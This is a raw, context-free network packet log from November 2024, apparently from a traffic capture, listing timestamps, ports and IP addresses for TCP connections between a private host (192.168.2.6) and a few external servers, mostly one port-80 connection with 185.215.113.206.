Nov 26, 2024 00:25:41.234922886 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.234986067 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.237042904 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.237056017 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.237112045 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.239075899 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.239161968 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.239257097 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.239475965 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.241336107 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.241348028 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.241415024 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.243393898 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.243522882 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.243616104 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.245558977 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.245642900 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.245650053 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.245722055 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.247757912 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.247811079 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.247818947 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.247853994 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.249892950 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.249964952 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.250026941 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.250073910 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.252058983 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.252119064 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.252171993 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.252218008 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.254276991 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.254288912 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.254323959 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.254349947 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.256407022 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.256469011 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.256506920 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.256548882 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.258534908 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.258605003 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.258621931 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.258662939 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.260719061 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.260731936 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.260776997 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.260808945 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.262873888 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.262942076 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.262980938 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.263005972 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.265002966 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.265124083 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.265134096 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.265176058 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.267189026 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.267239094 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.267317057 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.267441988 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.269294024 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.269347906 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.269426107 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.269512892 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.271522045 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.271646023 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.271686077 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.271686077 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.273659945 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.273716927 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.273823977 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.273886919 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.275814056 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.275898933 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.275923014 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.275949001 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.377233982 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.377341032 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.377378941 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.377522945 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.378150940 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.378227949 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.378613949 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.378628969 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.378668070 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.378699064 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.380588055 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.380603075 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.380641937 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.380676985 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.382574081 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.382642031 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.382644892 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.382746935 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.384303093 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.384318113 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.384375095 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.386209965 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.386224031 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.386276007 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.387906075 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.387967110 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.387988091 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.388056993 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.389652014 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.389693022 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.389719009 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.389748096 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.391516924 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.391582012 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.391643047 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.391798973 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.393181086 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.393260002 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.393368959 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.393438101 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.394895077 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.394999981 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.395008087 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.395131111 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.396707058 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.396723032 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.396786928 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.398248911 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.398313999 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.398447990 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.399652958 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.399889946 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.399945021 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.400057077 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.400866985 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.401525021 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.401555061 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.401596069 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.403059959 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.403155088 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.403280020 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.403522968 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.404755116 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.404769897 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.404848099 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.406256914 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.406344891 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.406510115 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.406554937 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.408025026 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.408039093 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.408181906 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.409533978 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.409621000 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.409689903 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.409785032 CET	443	49796	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:41.409862041 CET	443	49796	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:41.409945011 CET	49796	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:41.410944939 CET	49796	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:41.410978079 CET	443	49796	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:41.410998106 CET	49796	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:41.411006927 CET	443	49796	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:41.411109924 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.411165953 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.411298037 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.411341906 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.412775993 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.412795067 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.412885904 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.414252043 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.414346933 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.414355040 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.414387941 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.414932966 CET	49847	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:41.414982080 CET	443	49847	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:41.415106058 CET	49847	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:41.415997028 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.416049957 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.417546988 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.417736053 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.417774916 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.417814970 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.418771029 CET	49847	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:41.418788910 CET	443	49847	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:41.419096947 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.419147968 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.419159889 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.419181108 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.420826912 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.420840979 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.420892000 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.422373056 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.422386885 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.422452927 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.423924923 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.423989058 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.424105883 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.424835920 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.425533056 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.425579071 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.425720930 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.425770044 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.427228928 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.427242994 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.427294970 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.428858995 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.428873062 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.428936005 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.430341959 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.430406094 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.430449963 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.432076931 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.432096004 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.432172060 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.432183981 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.433523893 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.433695078 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.433760881 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.435165882 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.435220957 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.435375929 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.436422110 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.436857939 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.436872005 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.436908960 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.436928988 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.438268900 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.438318968 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.438433886 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.438527107 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.439951897 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.440103054 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.440174103 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.441519022 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.441716909 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.441776991 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.443238020 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.443250895 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.443309069 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.444685936 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.444746971 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.444888115 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.444947958 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.446254015 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.446320057 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.446428061 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.446469069 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.447918892 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.447994947 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.447998047 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.448112011 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.449481010 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.449506044 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.449562073 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.451071978 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.451153994 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.451164007 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.451203108 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.452734947 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.452795982 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.452811003 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.452856064 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.454251051 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.454314947 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.454440117 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.454499006 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.455981016 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.456202030 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.456239939 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.456239939 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.457494974 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.457587004 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.457653999 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.459054947 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.459119081 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.459189892 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.459264040 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.460830927 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.460841894 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.460923910 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.538985968 CET	443	49841	152.195.19.97	192.168.2.6
Nov 26, 2024 00:25:41.539410114 CET	49841	443	192.168.2.6	152.195.19.97
Nov 26, 2024 00:25:41.539441109 CET	443	49841	152.195.19.97	192.168.2.6
Nov 26, 2024 00:25:41.540510893 CET	443	49841	152.195.19.97	192.168.2.6
Nov 26, 2024 00:25:41.540575981 CET	49841	443	192.168.2.6	152.195.19.97
Nov 26, 2024 00:25:41.541960001 CET	49841	443	192.168.2.6	152.195.19.97
Nov 26, 2024 00:25:41.542035103 CET	443	49841	152.195.19.97	192.168.2.6
Nov 26, 2024 00:25:41.542505026 CET	49841	443	192.168.2.6	152.195.19.97
Nov 26, 2024 00:25:41.542511940 CET	443	49841	152.195.19.97	192.168.2.6
Nov 26, 2024 00:25:41.592478991 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.592499018 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.592513084 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.592549086 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.592556953 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.592569113 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.592578888 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.592580080 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.592596054 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.592611074 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.592634916 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.592732906 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.592771053 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.592781067 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.592811108 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.592828989 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.592833996 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.592840910 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.592864990 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.592879057 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.592879057 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.592899084 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.592902899 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.592911005 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.592931986 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.592937946 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.592952013 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.592958927 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.592984915 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.593010902 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.593023062 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.593039989 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.593051910 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.593053102 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.593064070 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.593079090 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.593082905 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.593102932 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.593128920 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.598937988 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.598993063 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.598999977 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.599014997 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.599040985 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.599066019 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.599078894 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.599090099 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.599102020 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.599112988 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.599117041 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.599126101 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.599134922 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.599167109 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.600589991 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.600601912 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.600615025 CET	80	49795	185.215.113.206	192.168.2.6
